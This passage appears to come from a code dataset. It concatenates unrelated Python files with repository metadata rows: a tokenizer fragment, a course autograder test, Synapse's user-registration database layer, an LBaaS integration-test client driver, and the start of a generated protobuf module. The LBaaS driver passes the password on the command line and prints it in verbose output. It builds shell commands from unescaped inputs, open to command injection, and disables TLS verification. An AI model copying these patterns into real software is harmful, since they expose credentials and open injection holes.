from sacremoses import MosesPunctNormalizer
self.punc_normalizer = MosesPunctNormalizer(self.source_lang).normalize
except (ImportError, FileNotFoundError):
warnings.warn("Recommended: pip install sacremoses.")
self.punc_normalizer = lambda x: x
def normalize(self, x: str) -> str:
"""Cover moses empty string edge case. They return empty list for '' input!"""
return self.punc_normalizer(x) if x else ""
def _convert_token_to_id(self, token):
return self.encoder.get(token, self.encoder[self.unk_token])
def remove_language_code(self, text: str):
"""Remove language codes like <<fr>> before sentencepiece"""
match = self.language_code_re.match(text)
code: list = [match.group(0)] if match else []
return code, self.language_code_re.sub("", text)
def _tokenize(self, text: str) -> List[str]:
code, text = self.remove_language_code(text)
pieces = self.current_spm.EncodeAsPieces(text)
return code + pieces
def _convert_id_to_token(self, index: int) -> str:
"""Converts an index (integer) in a token (str) using the encoder."""
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens: List[str]) -> str:
"""Uses target language sentencepiece model"""
return self.spm_target.DecodePieces(tokens)
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None) -> List[int]:
"""Build model inputs from a sequence by appending eos_token_id."""
if token_ids_1 is None:
return token_ids_0 + [self.eos_token_id]
# We don't expect to process pairs, but leave the pair logic for API consistency
return token_ids_0 + token_ids_1 + [self.eos_token_id]
@contextmanager
def as_target_tokenizer(self):
"""
Temporarily sets the tokenizer for encoding the targets. Useful for tokenizer associated to
sequence-to-sequence models that need a slightly different processing for the labels.
"""
self.current_spm = self.spm_target
yield
self.current_spm = self.spm_source
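    # Illustrative usage of the context manager above (an assumption based on
    # its docstring, not code from this file):
    #     with tokenizer.as_target_tokenizer():
    #         labels = tokenizer(tgt_texts, return_tensors="pt")["input_ids"]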
@property
def vocab_size(self) -> int:
return len(self.encoder)
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
save_dir = Path(save_directory)
assert save_dir.is_dir(), f"{save_directory} should be a directory"
save_json(
self.encoder,
save_dir / ((filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["vocab"]),
)
for orig, f in zip(["source.spm", "target.spm"], self.spm_files):
dest_path = save_dir / ((filename_prefix + "-" if filename_prefix else "") + Path(f).name)
if not dest_path.exists():
copyfile(f, save_dir / orig)
return tuple(
save_dir / ((filename_prefix + "-" if filename_prefix else "") + f) for f in self.vocab_files_names
)
def get_vocab(self) -> Dict:
vocab = self.encoder.copy()
vocab.update(self.added_tokens_encoder)
return vocab
def __getstate__(self) -> Dict:
state = self.__dict__.copy()
state.update({k: None for k in ["spm_source", "spm_target", "current_spm", "punc_normalizer"]})
return state
def __setstate__(self, d: Dict) -> None:
self.__dict__ = d
self.spm_source, self.spm_target = (load_spm(f) for f in self.spm_files)
self.current_spm = self.spm_source
self._setup_normalizer()
def num_special_tokens_to_add(self, **unused):
"""Just EOS"""
return 1
def _special_token_mask(self, seq):
all_special_ids = set(self.all_special_ids) # call it once instead of inside list comp
all_special_ids.remove(self.unk_token_id) # <unk> is only sometimes special
return [1 if x in all_special_ids else 0 for x in seq]
def get_special_tokens_mask(
self, token_ids_0: List, token_ids_1: Optional[List] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""Get list where entries are [1] if a token is [eos] or [pad] else 0."""
if already_has_special_tokens:
return self._special_token_mask(token_ids_0)
elif token_ids_1 is None:
return self._special_token_mask(token_ids_0) + [1]
else:
return self._special_token_mask(token_ids_0 + token_ids_1) + [1]
def load_spm(path: str) -> sentencepiece.SentencePieceProcessor:
spm = sentencepiece.SentencePieceProcessor()
spm.Load(path)
return spm
def save_json(data, path: str) -> None:
with open(path, "w") as f:
json.dump(data, f, indent=2)
def load_json(path: str) -> Union[Dict, List]:
with open(path, "r") as f:
return json.load(f)
| [
"[email protected]"
]
| |
6d00fe5a1897d38b38e75686b9f721e7d3b4fd16 | fc778e05df051a0773d80f867b1c84542b0a4b24 | /lab/lab06/tests/q114.py | aaa2d192866854e477170552bc1f816f32a05d9d | []
| no_license | yukgu/data-6 | d873e7231058b01365b278edc7ded4afade05b55 | e96c0d864f58b7041dfb0820d3e469927eac97b0 | refs/heads/master | 2022-11-28T18:48:17.515825 | 2020-08-12T22:55:48 | 2020-08-12T22:55:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 582 | py | test = {
"name": "Question 1.1.4.",
"points": 1,
"hidden": False,
"suites": [
{
"cases": [
{
"code": r"""
>>> import numpy as np
>>> np.isclose(berkeley_avg_in_thousands, 782.37)
True
""",
"hidden": False,
"locked": False,
},
],
"scored": True,
"setup": "",
"teardown": "",
"type": "doctest"
},
]
} | [
"[email protected]"
]
| |
3ef598f244237952f1ffa69ac0f468555824db8b | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/matrix-org_synapse/synapse-master/synapse/storage/registration.py | 26be6060c3be0523d8fdc939263fa610b948502c | []
| no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 17,431 | py | # -*- coding: utf-8 -*-
# Copyright 2014 - 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from twisted.internet import defer
from synapse.api.errors import StoreError, Codes
from synapse.storage import background_updates
from synapse.util.caches.descriptors import cached, cachedInlineCallbacks
class RegistrationStore(background_updates.BackgroundUpdateStore):
def __init__(self, hs):
super(RegistrationStore, self).__init__(hs)
self.clock = hs.get_clock()
self.register_background_index_update(
"access_tokens_device_index",
index_name="access_tokens_device_id",
table="access_tokens",
columns=["user_id", "device_id"],
)
self.register_background_index_update(
"refresh_tokens_device_index",
index_name="refresh_tokens_device_id",
table="refresh_tokens",
columns=["user_id", "device_id"],
)
@defer.inlineCallbacks
def add_access_token_to_user(self, user_id, token, device_id=None):
"""Adds an access token for the given user.
Args:
user_id (str): The user ID.
token (str): The new access token to add.
device_id (str): ID of the device to associate with the access
token
Raises:
StoreError if there was a problem adding this.
"""
next_id = self._access_tokens_id_gen.get_next()
yield self._simple_insert(
"access_tokens",
{
"id": next_id,
"user_id": user_id,
"token": token,
"device_id": device_id,
},
desc="add_access_token_to_user",
)
def register(self, user_id, token=None, password_hash=None,
was_guest=False, make_guest=False, appservice_id=None,
create_profile_with_localpart=None, admin=False):
"""Attempts to register an account.
Args:
user_id (str): The desired user ID to register.
token (str): The desired access token to use for this user. If this
is not None, the given access token is associated with the user
id.
password_hash (str): Optional. The password hash for this user.
was_guest (bool): Optional. Whether this is a guest account being
upgraded to a non-guest account.
make_guest (boolean): True if the the new user should be guest,
false to add a regular user account.
appservice_id (str): The ID of the appservice registering the user.
create_profile_with_localpart (str): Optionally create a profile for
the given localpart.
Raises:
StoreError if the user_id could not be registered.
"""
return self.runInteraction(
"register",
self._register,
user_id,
token,
password_hash,
was_guest,
make_guest,
appservice_id,
create_profile_with_localpart,
admin
)
def _register(
self,
txn,
user_id,
token,
password_hash,
was_guest,
make_guest,
appservice_id,
create_profile_with_localpart,
admin,
):
now = int(self.clock.time())
next_id = self._access_tokens_id_gen.get_next()
try:
if was_guest:
# Ensure that the guest user actually exists
# ``allow_none=False`` makes this raise an exception
# if the row isn't in the database.
self._simple_select_one_txn(
txn,
"users",
keyvalues={
"name": user_id,
"is_guest": 1,
},
retcols=("name",),
allow_none=False,
)
self._simple_update_one_txn(
txn,
"users",
keyvalues={
"name": user_id,
"is_guest": 1,
},
updatevalues={
"password_hash": password_hash,
"upgrade_ts": now,
"is_guest": 1 if make_guest else 0,
"appservice_id": appservice_id,
"admin": 1 if admin else 0,
}
)
else:
self._simple_insert_txn(
txn,
"users",
values={
"name": user_id,
"password_hash": password_hash,
"creation_ts": now,
"is_guest": 1 if make_guest else 0,
"appservice_id": appservice_id,
"admin": 1 if admin else 0,
}
)
except self.database_engine.module.IntegrityError:
raise StoreError(
400, "User ID already taken.", errcode=Codes.USER_IN_USE
)
if token:
# it's possible for this to get a conflict, but only for a single user
# since tokens are namespaced based on their user ID
txn.execute(
"INSERT INTO access_tokens(id, user_id, token)"
" VALUES (?,?,?)",
(next_id, user_id, token,)
)
if create_profile_with_localpart:
txn.execute(
"INSERT INTO profiles(user_id) VALUES (?)",
(create_profile_with_localpart,)
)
self._invalidate_cache_and_stream(
txn, self.get_user_by_id, (user_id,)
)
txn.call_after(self.is_guest.invalidate, (user_id,))
@cached()
def get_user_by_id(self, user_id):
return self._simple_select_one(
table="users",
keyvalues={
"name": user_id,
},
retcols=["name", "password_hash", "is_guest"],
allow_none=True,
desc="get_user_by_id",
)
def get_users_by_id_case_insensitive(self, user_id):
"""Gets users that match user_id case insensitively.
Returns a mapping of user_id -> password_hash.
"""
def f(txn):
sql = (
"SELECT name, password_hash FROM users"
" WHERE lower(name) = lower(?)"
)
txn.execute(sql, (user_id,))
return dict(txn.fetchall())
return self.runInteraction("get_users_by_id_case_insensitive", f)
def user_set_password_hash(self, user_id, password_hash):
"""
NB. This does *not* evict any cache because the one use for this
removes most of the entries subsequently anyway so it would be
pointless. Use flush_user separately.
"""
def user_set_password_hash_txn(txn):
self._simple_update_one_txn(
txn,
'users', {
'name': user_id
},
{
'password_hash': password_hash
}
)
self._invalidate_cache_and_stream(
txn, self.get_user_by_id, (user_id,)
)
return self.runInteraction(
"user_set_password_hash", user_set_password_hash_txn
)
@defer.inlineCallbacks
def user_delete_access_tokens(self, user_id, except_token_id=None,
device_id=None,
delete_refresh_tokens=False):
"""
Invalidate access/refresh tokens belonging to a user
Args:
user_id (str): ID of user the tokens belong to
except_token_id (str): list of access_tokens IDs which should
*not* be deleted
device_id (str|None): ID of device the tokens are associated with.
If None, tokens associated with any device (or no device) will
be deleted
delete_refresh_tokens (bool): True to delete refresh tokens as
well as access tokens.
Returns:
defer.Deferred:
"""
def f(txn):
keyvalues = {
"user_id": user_id,
}
if device_id is not None:
keyvalues["device_id"] = device_id
if delete_refresh_tokens:
self._simple_delete_txn(
txn,
table="refresh_tokens",
keyvalues=keyvalues,
)
items = keyvalues.items()
where_clause = " AND ".join(k + " = ?" for k, _ in items)
values = [v for _, v in items]
if except_token_id:
where_clause += " AND id != ?"
values.append(except_token_id)
txn.execute(
"SELECT token FROM access_tokens WHERE %s" % where_clause,
values
)
rows = self.cursor_to_dict(txn)
for row in rows:
self._invalidate_cache_and_stream(
txn, self.get_user_by_access_token, (row["token"],)
)
txn.execute(
"DELETE FROM access_tokens WHERE %s" % where_clause,
values
)
yield self.runInteraction(
"user_delete_access_tokens", f,
)
def delete_access_token(self, access_token):
def f(txn):
self._simple_delete_one_txn(
txn,
table="access_tokens",
keyvalues={
"token": access_token
},
)
self._invalidate_cache_and_stream(
txn, self.get_user_by_access_token, (access_token,)
)
return self.runInteraction("delete_access_token", f)
@cached()
def get_user_by_access_token(self, token):
"""Get a user from the given access token.
Args:
token (str): The access token of a user.
Returns:
defer.Deferred: None, if the token did not match, otherwise dict
including the keys `name`, `is_guest`, `device_id`, `token_id`.
"""
return self.runInteraction(
"get_user_by_access_token",
self._query_for_auth,
token
)
@defer.inlineCallbacks
def is_server_admin(self, user):
res = yield self._simple_select_one_onecol(
table="users",
keyvalues={"name": user.to_string()},
retcol="admin",
allow_none=True,
desc="is_server_admin",
)
defer.returnValue(res if res else False)
@cachedInlineCallbacks()
def is_guest(self, user_id):
res = yield self._simple_select_one_onecol(
table="users",
keyvalues={"name": user_id},
retcol="is_guest",
allow_none=True,
desc="is_guest",
)
defer.returnValue(res if res else False)
def _query_for_auth(self, txn, token):
sql = (
"SELECT users.name, users.is_guest, access_tokens.id as token_id,"
" access_tokens.device_id"
" FROM users"
" INNER JOIN access_tokens on users.name = access_tokens.user_id"
" WHERE token = ?"
)
txn.execute(sql, (token,))
rows = self.cursor_to_dict(txn)
if rows:
return rows[0]
return None
@defer.inlineCallbacks
def user_add_threepid(self, user_id, medium, address, validated_at, added_at):
yield self._simple_upsert("user_threepids", {
"medium": medium,
"address": address,
}, {
"user_id": user_id,
"validated_at": validated_at,
"added_at": added_at,
})
@defer.inlineCallbacks
def user_get_threepids(self, user_id):
ret = yield self._simple_select_list(
"user_threepids", {
"user_id": user_id
},
['medium', 'address', 'validated_at', 'added_at'],
'user_get_threepids'
)
defer.returnValue(ret)
@defer.inlineCallbacks
def get_user_id_by_threepid(self, medium, address):
ret = yield self._simple_select_one(
"user_threepids",
{
"medium": medium,
"address": address
},
['user_id'], True, 'get_user_id_by_threepid'
)
if ret:
defer.returnValue(ret['user_id'])
defer.returnValue(None)
def user_delete_threepids(self, user_id):
return self._simple_delete(
"user_threepids",
keyvalues={
"user_id": user_id,
},
desc="user_delete_threepids",
)
def user_delete_threepid(self, user_id, medium, address):
return self._simple_delete(
"user_threepids",
keyvalues={
"user_id": user_id,
"medium": medium,
"address": address,
},
desc="user_delete_threepids",
)
@defer.inlineCallbacks
def count_all_users(self):
"""Counts all users registered on the homeserver."""
def _count_users(txn):
txn.execute("SELECT COUNT(*) AS users FROM users")
rows = self.cursor_to_dict(txn)
if rows:
return rows[0]["users"]
return 0
ret = yield self.runInteraction("count_users", _count_users)
defer.returnValue(ret)
@defer.inlineCallbacks
def find_next_generated_user_id_localpart(self):
"""
Gets the localpart of the next generated user ID.
Generated user IDs are integers, and we aim for them to be as small as
we can. Unfortunately, it's possible some of them are already taken by
existing users, and there may be gaps in the already taken range. This
function returns the start of the first allocatable gap. This is to
avoid the case of ID 10000000 being pre-allocated, so us wasting the
first (and shortest) many generated user IDs.
"""
def _find_next_generated_user_id(txn):
txn.execute("SELECT name FROM users")
rows = self.cursor_to_dict(txn)
            regex = re.compile(r"^@(\d+):")
found = set()
for r in rows:
user_id = r["name"]
match = regex.search(user_id)
if match:
found.add(int(match.group(1)))
for i in xrange(len(found) + 1):
if i not in found:
return i
defer.returnValue((yield self.runInteraction(
"find_next_generated_user_id",
_find_next_generated_user_id
)))
@defer.inlineCallbacks
def get_3pid_guest_access_token(self, medium, address):
ret = yield self._simple_select_one(
"threepid_guest_access_tokens",
{
"medium": medium,
"address": address
},
["guest_access_token"], True, 'get_3pid_guest_access_token'
)
if ret:
defer.returnValue(ret["guest_access_token"])
defer.returnValue(None)
@defer.inlineCallbacks
def save_or_get_3pid_guest_access_token(
self, medium, address, access_token, inviter_user_id
):
"""
Gets the 3pid's guest access token if exists, else saves access_token.
Args:
medium (str): Medium of the 3pid. Must be "email".
address (str): 3pid address.
access_token (str): The access token to persist if none is
already persisted.
inviter_user_id (str): User ID of the inviter.
Returns:
deferred str: Whichever access token is persisted at the end
of this function call.
"""
def insert(txn):
txn.execute(
"INSERT INTO threepid_guest_access_tokens "
"(medium, address, guest_access_token, first_inviter) "
"VALUES (?, ?, ?, ?)",
(medium, address, access_token, inviter_user_id)
)
try:
yield self.runInteraction("save_3pid_guest_access_token", insert)
defer.returnValue(access_token)
except self.database_engine.module.IntegrityError:
ret = yield self.get_3pid_guest_access_token(medium, address)
defer.returnValue(ret)
| [
"[email protected]"
]
| |
e9e15aabeeb19d067d2268bae9dc0e125bd40664 | 0286c905b0b2d7e956940524aa65668c3e4347fd | /driver/python-client.py | 12db4b64292961ae24c1aeb85ba208e50c97dfb8 | []
| no_license | pcrews/libra-integration-tests | 44e4597805d27423cf22a8c3f206305248d87766 | 0f3ee771512d2e859fe52bbcfd1d9f25d02f89b5 | refs/heads/master | 2021-01-23T07:26:51.001891 | 2014-05-06T18:57:00 | 2014-05-06T18:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,365 | py | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" python-client.py
methods for interacting with the lbaas service
via python-libraclient requests
"""
import os
import ast
import json
import time
import requests
import commands
class lbaasDriver:
""" Driver to handle http interaction with the libra lbaas service
Contains methods to call the various api methods as well as
code for validating the actions
"""
def __init__(self, args, api_user_url):
""" TODO: put in validation and api-specific whatnot here """
self.args = args
self.api_user_url = api_user_url
self.supported_algorithms = ['ROUND_ROBIN', 'LEAST_CONNECTIONS', None]
self.user_name = args.osusername
self.auth_url = args.osauthurl
self.tenant_name = args.ostenantname
self.password = args.ospassword
self.good_status = args.successstatuscode
self.verbose = args.verbose
self.region_name = args.osregionname
        self.base_cmd = ("libra_client --os_auth_url=%s --os_username=%s"
                         " --os_password=%s --os_tenant_name=%s"
                         " --os_region_name=%s") % (self.auth_url,
                                                    self.user_name,
                                                    self.password,
                                                    self.tenant_name,
                                                    self.region_name)
if args.prodhack:
self.base_cmd += " --bypass_url=%s --insecure" % self.api_user_url
# bit of a hack to eliminate some saltstack garbage
# we get with the client
self.garbage_output = ['/usr/lib/python2.7/getpass.py:83: GetPassWarning: Can not control echo on the terminal.',
'passwd = fallback_getpass(prompt, stream)',
'Warning: Password input may be echoed.',
'Please set a password for your new keyring'
]
self.get_swift_credentials()
return
def get_swift_credentials(self):
""" Get our keystone auth token to work with the api server """
self.swift_endpoint = None
headers = {"Content-Type": "application/json"}
request_data = {'auth': {'tenantName': self.tenant_name,
'passwordCredentials': {'username': self.user_name,
'password': self.password}
}
}
request_data = json.dumps(request_data)
auth_url = self.auth_url
if not self.auth_url.endswith('tokens'):
auth_url = os.path.join(self.auth_url, 'tokens')
request_result = requests.post(auth_url, data=request_data, headers=headers, verify=False)
if self.verbose:
print 'Status: %s' % request_result.status_code
print 'Output:\n%s' % (request_result.text)
        request_data = json.loads(request_result.text)
for service_data in request_data['access']['serviceCatalog']:
if service_data['name'] == 'Object Storage':
self.swift_endpoint = service_data['endpoints'][0]['publicURL'].replace('\\', '')
self.auth_token = request_data['access']['token']['id']
self.tenant_id = request_data['access']['token']['tenant']['id']
return
def trim_garbage_output(self, output):
for garbage_item in self.garbage_output:
output = output.replace(garbage_item, '').strip()
return output
def execute_cmd(self, cmd):
status, output = commands.getstatusoutput(cmd)
output = self.trim_garbage_output(output)
if self.verbose:
print "Command: %s" % cmd
print "Status: %s" % status
print "Output:\n%s" % output
return status, output
def handle_client_side_errors(self, data, client_action=None, algorithm=None):
# a bit of a hack for client-side handling of some bad requests
# python-libraclient appears to detect / check and provide a
# 'you used me wrong' type of message vs. a 'from-the-api-server' error code
status = '512' # default / what brought us here
error_strings = ["Invalid IP:port specified for --node",
"Libra command line client %s: error: argument --algorithm: invalid choice: '%s'" % (client_action, algorithm)
]
for line in data:
for error_string in error_strings:
if error_string in line:
status = '400'
return status
#-----------------
# lbaas functions
#-----------------
def create_lb(self, name, nodes, algorithm, bad_statuses, vip=None):
""" Create a load balancer via the requests library
We expect the url to be the proper, fully constructed base url
we add the 'loadbalancers suffix to the base
nodes is expected to be a list of nodes in this format:
nodes = [{"address": "15.185.227.167","port": "80"},{"address": "15.185.227.165","port": "80"}]
"""
lb_id = None
lb_addr = None
tcp_https_flag = False
cmd = self.base_cmd + ' create --name="%s"' % name
for node in nodes:
node_info = ''
address = ''
port = ''
if 'address' in node:
address = node['address']
if 'port' in node:
port = node['port']
if str(port) == '443':
tcp_https_flag = True
cmd += ' --node=%s:%s' % (address, port)
if algorithm:
cmd += ' --algorithm=%s' % algorithm
if tcp_https_flag:
cmd += ' --protocol=TCP --port=443'
if vip:
cmd += ' --vip=%s' % vip
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if len(data) >= 3 and algorithm in self.supported_algorithms:
data = data[3]
lb_data = data.split('|')
lb_id = lb_data[1].strip()
lb_stats = ast.literal_eval(lb_data[9].strip())
lb_addr = lb_stats[0]['address']
status = self.args.successstatuscode
attempts_remain = 120
time_wait = 1
while not lb_addr and attempts_remain:
result_data = self.list_lb_detail(lb_id)
if 'virtualIps' in result_data:
lb_addr = result_data['virtualIps'][0]['address']
if lb_addr:
attempts_remain = 0
else:
attempts_remain -= 1
time.sleep(time_wait)
else:
attempts_remain -= 1
time.sleep(time_wait)
elif str(status) == '512':
status = self.handle_client_side_errors(data, 'create', algorithm)
else:
data = data[0]
if 'HTTP' in data:
status = data.split('(HTTP')[1].strip().replace(')', '')
return output, status, lb_id, lb_addr # TODO detect error statuses!!!!!
def delete_lb(self, lb_id):
""" Delete the loadbalancer identified by 'lb_id' """
if lb_id:
cmd = self.base_cmd + ' delete --id=%s' % lb_id
status, output = self.execute_cmd(cmd)
return output
def delete_lb_node(self, lb_id, node_id):
""" Remove specified node_id from lb_id """
cmd = self.base_cmd + " node-delete --id=%s --nodeid=%s" % (lb_id, node_id)
status, output = self.execute_cmd(cmd)
if status == 0:
return '202'
return status
def list_lbs(self):
""" List all loadbalancers for the given auth token / tenant id """
url = "%s/loadbalancers" % self.api_user_url
cmd = self.base_cmd + ' list'
status, output = self.execute_cmd(cmd)
data = output.split('\n')
field_names = []
for field_name in data[1].split('|')[1:-1]:
field_names.append(field_name.strip().lower())
loadbalancers = []
data = output.split('\n')[3:-1] # get the 'meat' / data
for lb_row in data:
loadbalancer = {}
lb_data = lb_row.split('|')[1:-1]
for idx, lb_item in enumerate(lb_data):
loadbalancer[field_names[idx]] = lb_item[1:-1]
loadbalancers.append(loadbalancer)
return loadbalancers
def list_lb_detail(self, lb_id):
""" Get the detailed info returned by the api server for the specified id """
cmd = self.base_cmd + ' status --id=%s' % lb_id
status, output = self.execute_cmd(cmd)
data = output.split('\n')
field_names = []
for field_name in data[1].split('|')[1:-1]:
field_names.append(field_name.strip().lower())
data = output.split('\n')[3:-1][0] # get the 'meat' / data and expect one line
# expect a single line of detail data
loadbalancer_detail = {}
lb_data = data.split('|')[1:-1]
for idx, lb_item in enumerate(lb_data):
if field_names[idx] == 'nodes':
loadbalancer_detail[field_names[idx]] = ast.literal_eval(lb_item.strip())
else:
loadbalancer_detail[field_names[idx]] = lb_item[1:-1]
return loadbalancer_detail
def list_lb_nodes(self, lb_id):
""" Get list of nodes for the specified lb_id """
cmd = self.base_cmd + ' node-list --id=%s' % lb_id
status, output = self.execute_cmd(cmd)
data = output.split('\n')
field_names = []
for field_name in data[1].split('|')[1:-1]:
field_names.append(field_name.strip().lower())
node_dict = {}
node_list = []
data = output.split('\n')[3:-1] # get the 'meat' / data
for node_row in data:
node = {}
node_data = node_row.split('|')[1:-1]
for idx, node_item in enumerate(node_data):
node[field_names[idx]] = node_item.strip()
node_list.append(node)
node_dict['nodes'] = node_list
return node_dict
def update_lb(self, lb_id, update_data):
""" We get a dictionary of update_data
containing a new name, algorithm, or both
and we execute an UPDATE API call and see
what happens
"""
cmd = self.base_cmd + ' modify --id=%s' % (lb_id)
if 'name' in update_data:
cmd += ' --name="%s"' % update_data['name']
if 'algorithm' in update_data:
cmd += ' --algorithm=%s' % update_data['algorithm']
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if output.strip() in ['', ':']:
status = self.good_status
elif str(status) == '512':
            status = self.handle_client_side_errors(data, 'modify', update_data.get('algorithm'))
else:
data = data[0]
if 'HTTP' in data:
status = data.split('(HTTP')[1].strip().replace(')', '')
return status
def add_nodes(self, lb_id, add_node_data):
""" We get a list of nodes we want to add and
try to add them :)
"""
cmd = self.base_cmd + ' node-add --id=%s' % (lb_id)
for node in add_node_data:
node_info = ''
address = ''
port = ''
if 'address' in node:
address = node['address']
if 'port' in node:
port = node['port']
if str(port) == '443':
tcp_https_flag = True
cmd += ' --node=%s:%s' % (address, port)
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if 'HTTP' in data[0]:
status = data[0].split('(HTTP')[1].strip().replace(')', '')
elif str(status) == '512':
status = self.handle_client_side_errors(data)
else:
status = self.good_status
return output, status
def modify_node(self, lb_id, node_id, node_data):
""" Set the node's condition to the value specified """
cmd = self.base_cmd + ' node-modify --id=%s --nodeid=%s' % (lb_id, node_id)
if 'condition' in node_data:
cmd += ' --condition=%s' % (node_data['condition'])
if 'address' in node_data or 'port' in node_data:
# hack as client only allows node updates of condition...
return '400'
status, output = self.execute_cmd(cmd)
data = output.split('\n')
if 'HTTP' in data[0]:
status = data[0].split('(HTTP')[1].strip().replace(')', '')
elif str(status) == '512':
status = self.handle_client_side_errors(data)
else:
status = '204'
return status
def get_logs(self, lb_id, auth_token=None, obj_endpoint=None, obj_basepath=None):
""" Get the logs / archive them for the listed lb_id """
if auth_token:
use_token = auth_token
else:
use_token = self.auth_token
if obj_endpoint:
use_endpoint = obj_endpoint
else:
use_endpoint = self.swift_endpoint
        cmd = self.base_cmd + ' logs --id=%s --token=%s --endpoint=%s' % (lb_id, use_token, use_endpoint)
        if obj_basepath:
            cmd += ' --basepath=%s' % obj_basepath
status, output = self.execute_cmd(cmd)
if not status:
status = '204'
return status
# validation functions
# these should likely live in a separate file, but putting
# validation + actions together for now
def validate_lb_nodes(self, expected_nodes, system_nodes):
""" We go through our list of expected nodes and compare them
to our system nodes
"""
error = 0
error_list = []
if len(expected_nodes) != len(system_nodes):
error_list.append("ERROR: Node mismatch between request and api server detail: %s || %s" % (expected_nodes, system_nodes))
error = 1
for node in expected_nodes:
match = 0
for sys_node in system_nodes:
if not match and node['address'] == sys_node['address'] and int(node['port']) == int(sys_node['port']):
match = 1
if not match:
error_list.append("ERROR: Node: %s has no match from api server" % (node))
error = 1
return error, error_list
def validate_status(self, expected_status, actual_status):
""" See what the result_dictionary status_code is and
compare it to our expected result """
if str(actual_status) == str(expected_status):
result = True
else:
result = False
return result
def validate_lb_list(self, lb_name, loadbalancers):
match = False
for loadbalancer in loadbalancers:
"""
if self.args.verbose:
for key, item in loadbalancer.items():
self.logging.info('%s: %s' % (key, item))
"""
# This is a bit bobo, but we have variable whitespace
# padding in client output depending on other names
# that exist in the lb list and we test with whitespace
# names. Time to make this perfect isn't available, so
# this works for the most part.
if lb_name.strip() == loadbalancer['name'].strip():
match = True
return match
| [
"[email protected]"
]
| |
421594bcaed8aa3f30b6523167db2e27b5eda17b | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v4/proto/errors/extension_setting_error_pb2.py | be7216100728c18ba162b3213ffa8057ae1e1e1b | [
"Apache-2.0"
]
| permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 17,018 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v4/proto/errors/extension_setting_error.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v4/proto/errors/extension_setting_error.proto',
package='google.ads.googleads.v4.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v4.errorsB\032ExtensionSettingErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v4/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V4.Errors\312\002\036Google\\Ads\\GoogleAds\\V4\\Errors\352\002\"Google::Ads::GoogleAds::V4::Errors'),
